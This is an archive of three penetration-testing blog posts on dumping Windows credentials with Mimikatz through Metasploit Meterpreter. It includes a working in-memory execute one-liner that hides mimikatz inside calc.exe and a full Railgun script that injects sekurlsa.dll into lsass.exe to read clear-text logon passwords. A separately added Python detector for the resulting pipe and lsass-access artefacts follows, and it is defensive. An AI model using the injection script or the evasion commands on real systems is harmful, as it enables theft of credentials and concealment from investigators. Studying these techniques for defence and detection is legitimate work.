
Entries in mimikatz (3)

Monday, Apr 08 2013

Sessiondump Meterpreter Extension

Mimikatz is awesome, right? So is WCE. But both have one fatal flaw: even though you can execute them in memory {link}, you still have to have the binaries, remember the command to execute them in memory, and ultimately transfer the entire binary over so that Metasploit can do its thing.

Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

[screenshot: the congratulatory tweet]

No blog post or huge Vegas-lights talk on it at DefCon or Blackhat. It was just posted online in a corner of the Internet:

[screenshot: the Sessiondump download page]

http://www.hsc.fr/ressources/outils/sessiondump/

Before we get started, let's be clear about one thing. Sessiondump, while awesome, doesn't do everything that Mimikatz does. However, it does do the features of Mimikatz that I use the most: dumping the hashes of logged-on users and dumping the wdigest clear-text passwords. It does this as a Meterpreter extension that operates using reflective DLL injection. Does that solve the minor issues we had with Mimikatz? As of right now, only partially. This code was simply posted online, not in a pull request or submitted to Metasploit in any way, so you still have to have the binary plus the code. What about the remembering? Surely it makes it so I can just tab-complete my way to passwords, right? Yup, it does, but until/if it is in the Metasploit trunk you will still have to remember how to get it installed (which we will go over in a bit). As for the final issue: yes, it does still transfer a complete DLL over to the host, the same as any of the other extensions (not to disk, mind you, just memory).

Without further ado, let's go ahead and get the file and do a bunch of extracting.

[screenshot: downloading the archive]

[screenshot: extracting the archive]

And finally, placing everything in its correct place, which the author was nice enough to make easy by giving the archive the same layout as the Metasploit directory structure:

[screenshot: files copied into the Metasploit directory tree]

Cool, everything should be good to go. Let's use this thing. I'm using psexec to get a shell, but any way you get a Windows native Meterpreter is fine, with one caveat, and it's the same as with any of the other aforementioned tools: you need to be Admin (past UAC, with the SeDebug privilege) or NT AUTHORITY\SYSTEM. After that it's cake; load the extension:

[screenshot: loading the sessiondump extension]

Here are the available commands:

[screenshot: sessiondump command list]

And run getHashes:

[screenshot: getHashes output]

or getwDigestPasswords:

[screenshot: getwDigestPasswords output]

That's it, you have free passwords, YAY...

Possible issues you may run into:

1) If you are on an x64 box and Meterpreter isn't running in an x64 process, it will fail, saying that it doesn't have the correct version offsets. Here is how you can check:

[screenshot: sysinfo showing an x64 system with an x86 Meterpreter]

x64 system and Meterpreter is x86/win32. Let's find a good process to migrate into and kick it off from there. Winlogon isn't the greatest choice, since if Meterpreter crashes it during migration the system will go down, whereas a service running as SYSTEM will probably just restart if something fails.

[screenshot: migrating to a SYSTEM service process and re-running getHashes]

2) If by any chance you are running it against a system the author hasn't gotten the offsets for. I don't have a screenshot for this one because he covers all the languages I have CMs for, but the author was awesome enough to include a few Python scripts that can help you generate the correct offsets. I'll show you by running it on my lsass and wdigest.dll files, even though he already has this data included in the CSV file that comes with Sessiondump.

Thats all for now folks, may the shells be with you.

 

Wednesday, Sep 05 2012

Completely In-memory Mimikatz with Metasploit

Executing WCE.exe in memory, as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram, has two issues. 1) You leave a file on disk with your hashes and clear-text passwords. That just won't do. 2) There is a DLL called WCEAUX.dll that gets written to disk for the briefest second:

[screenshot: WCEAUX.dll briefly appearing on disk]

(Yes, I realize I'm running 'wce32.exe' from disk here, but it exhibits the same DLL drop when run in memory.)

Now, don't get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, you use the best tool for the job. And today, that's Mimikatz.

Just like with WCE, to execute it in memory you use the -m flag of execute:

execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

Mimikatz requires double quotes around commands passed on its command line, so we use single quotes in Meterpreter to enclose the execute arguments (-a). This runs "sekurlsa::logonPasswords full" first, then 'exit' to auto-exit the Mimikatz console. Like so:

[screenshot: execute -m running mimikatz.exe and dumping logon passwords]

And all you get forensically is calc.exe loading a ton of DLLs it has no business loading, but no new files touch disk ;-)

[screenshot: calc.exe's loaded module list]

The downloads for Mimikatz are where they always are:

http://blog.gentilkiwi.com/mimikatz

Oh, did I mention that Mimikatz is open source and that the in-memory goodness has been uploaded to SVN:

https://code.google.com/p/mimikatz/

Awesome work @gentilkiwi

If you want to check out the fix that was implemented to work with Meterpreter's in-memory goodness, check here:

https://code.google.com/p/mimikatz/source/detail?r=33

Friday, Jun 15 2012

Integration of Mimikatz into Metasploit Stage1

One of the powers of Metasploit is its ability to stay memory resident: through the use of reflective DLL injection, even new functionality the attacker loads never touches disk. Well, the first thing I wanted to do with Mimikatz was get it to that same level.

Here is my first step to that end: a Railgun-based Meterpreter script. Before going all reflective with it I needed to understand how the DLL worked. Thankfully @gentilkiwi stepped in and stopped my head from getting bloody. In this first step we will be removing the need for the mimikatz.exe binary, while still needing the DLL to be uploaded, but we'll get there in subsequent posts.

Ignore do_cmd for now; I stepped through remote DLL injection here. So the first odd lines are

handle = client.railgun.kernel32.CreateNamedPipeW('\\\\.\\pipe\\kiwi\\mimikatz', 'PIPE_ACCESS_DUPLEX', 'PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT', 1, 0, 0, 30000,nil)['return']

connectedlsass = client.railgun.kernel32.ConnectNamedPipe(handle,nil)

 

Essentially these create and connect the named pipe that sekurlsa.dll uses to talk to mimikatz.exe in its normal operation. Then we just use the Windows API call "ReadFile" from there on out.

client.railgun.kernel32.ReadFile(handle,248,248,4,nil)

One of the drawbacks to doing this all remotely is that Railgun doesn't have the insight into memory management that the Windows OS does. Knowing when pipes are ready to be read or written to is a bit of a challenge, and the call hangs your IRB / Meterpreter session if you get it wrong. I've overcome this for the initial "banner" that sekurlsa writes by knowing the exact length (248 bytes in this case) of the text. For subsequent commands like "ping" and "getLogonPasswords" I simply have to read one character at a time (two bytes for every Unicode character), which is a slow process but removes any chance of getting hung.

If you have any questions on how/why this works or have a better way please leave your comments and questions below or hit me up on twitter!


Meterpreter Script:

def do_cmd(handle,cmd)
	# sekurlsa expects commands on the pipe as UTF-16LE
	ucommand = Rex::Text.to_unicode(cmd)
	sendcmd = client.railgun.kernel32.WriteFile(handle,ucommand,ucommand.size,4,nil)
	good2go = false
	newline = false
	readstring = []
	while good2go == false
		# Have to pull data 1 unicode character (2 bytes) at a time
		# this is because the pipe won't write or read if
		# too much was written or read by the "client" (us)
		pull = client.railgun.kernel32.ReadFile(handle,2,2,4,nil)
		# Check to see if our end-of-read marker is there: "\n\000@\000"
		# (a newline followed by the '@' prompt character)
		if pull['lpBuffer'] == "@\000" and newline == true
			good2go = true
		else
			readstring << pull['lpBuffer']
		end
		
		# Ready the newline var for the previous check on the next loop
		if pull['lpBuffer'] == "\n\000"
			newline = true
		else
			newline = false
		end
	end
	
	# Convert the collected UTF-16LE bytes back to ASCII before printing
	print_status(Rex::Text.to_ascii(readstring.join("")))
end

print_status("x86 Detected - Using x86 mimikatz")
# Create the server end of the pipe that sekurlsa.dll will connect back to
handle = client.railgun.kernel32.CreateNamedPipeW('\\\\.\\pipe\\kiwi\\mimikatz', 'PIPE_ACCESS_DUPLEX', 'PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT', 1, 0, 0, 30000,nil)['return']
print_status("Handle: #{handle}")
# Inject from a separate thread: ConnectNamedPipe below blocks until sekurlsa connects
framework.threads.spawn('injectlsass',false) {
	pid = client.sys.process['lsass.exe']
	print_status("LSASS located at PID: #{pid}")
	# sekurlsa.dll still has to be uploaded to this path first
	pathtomimi = "C:\\sekurlsa.dll"

	# loadlibrary payload stub that calls LoadLibrary on the DLL inside lsass
	pay = client.framework.payloads.create("windows/loadlibrary")
	pay.datastore["DLL"] = pathtomimi
	pay.datastore["EXITFUNC"] = 'thread'

	raw = pay.generate
	targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
	mem = targetprocess.memory.allocate(raw.length + (30024))
	targetprocess.memory.write(mem, raw)
	sleep(2)
	targetprocess.thread.create(mem, 0)
	print_status("Successfully Injected into LSASS")
}
print_status("Waiting for LSASS injection to complete")
# Blocks until sekurlsa.dll opens the pipe from inside lsass
connectedlsass = client.railgun.kernel32.ConnectNamedPipe(handle,nil)
print_status("Mimikatz has called home, ready for command")
sleep(2)
print_status("Reading banner")
# The banner has a known length (248 bytes), so it can be read in one call
client.railgun.kernel32.ReadFile(handle,248,248,4,nil)
print_status("Doing a quick ping to make sure things are working...")
do_cmd(handle,'ping')
print_status("If you made it this far it worked, doing getLogonPasswords")
do_cmd(handle, 'getLogonPasswords')
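For the defensive side of both the script above and the calc.exe trick in the Sep 2012 post, here is an added Python example (not code from this blog, Mimikatz or Metasploit) that flags the two artefacts these techniques leave in endpoint telemetry: the \\.\pipe\kiwi\mimikatz named pipe from the CreateNamedPipeW call, and a handle to lsass.exe opened with PROCESS_ALL_ACCESS from an image that has no business doing so. Sysmon Event IDs 17/18 (pipe created/connected) and 10 (process access) are real; the flat event layout, the sample values and the list of expected lsass clients are constructed assumptions to tune per environment.

```python
"""Added example: flag pipe and lsass-access artefacts of the sekurlsa.dll technique.

Events are a simplified, constructed rendering of Sysmon Event ID 17 (pipe created),
18 (pipe connected) and 10 (process access); they are not real telemetry.
"""
from typing import Dict, List, Optional

# Pipe name as Sysmon reports it (assumed: without the \\.\pipe\ prefix),
# taken from the CreateNamedPipeW call in the Meterpreter script.
SUSPICIOUS_PIPES = {r"\kiwi\mimikatz"}

# Images that legitimately open lsass.exe on a typical host (assumption; tune per environment).
EXPECTED_LSASS_CLIENTS = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\csrss.exe"}

# Rights needed to inject a DLL into lsass: PROCESS_CREATE_THREAD (0x2),
# PROCESS_VM_OPERATION (0x8) and PROCESS_VM_WRITE (0x20). PROCESS_ALL_ACCESS covers all three.
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020

# Constructed sample events mirroring what the posts describe.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "17", "image": r"C:\Windows\System32\calc.exe", "pipe": r"\kiwi\mimikatz"},
    {"id": "18", "image": r"C:\Windows\System32\lsass.exe", "pipe": r"\kiwi\mimikatz"},
    {"id": "10", "source": r"C:\Windows\System32\calc.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    {"id": "10", "source": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1000"},
    {"id": "17", "image": r"C:\Windows\System32\svchost.exe", "pipe": r"\wkssvc"},
]


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Return an alert label for one event, or None if it looks benign."""
    if ev["id"] in ("17", "18") and ev["pipe"].lower() in SUSPICIOUS_PIPES:
        return f"mimikatz pipe {ev['pipe']} used by {ev['image']}"
    if ev["id"] == "10" and ev["target"].lower().endswith(r"\lsass.exe"):
        rights = int(ev["access"], 16)
        if rights & INJECTION_RIGHTS and ev["source"].lower() not in EXPECTED_LSASS_CLIENTS:
            return f"lsass opened with 0x{rights:X} by {ev['source']}"
    return None


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Run classify over a batch and return only the alert labels."""
    return [label for label in map(classify, events) if label]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

A read-only open of lsass (for example GrantedAccess 0x1010) is deliberately not matched by this rule, which targets the DLL-injection variant shown on this page; memory-read dumping needs its own rule.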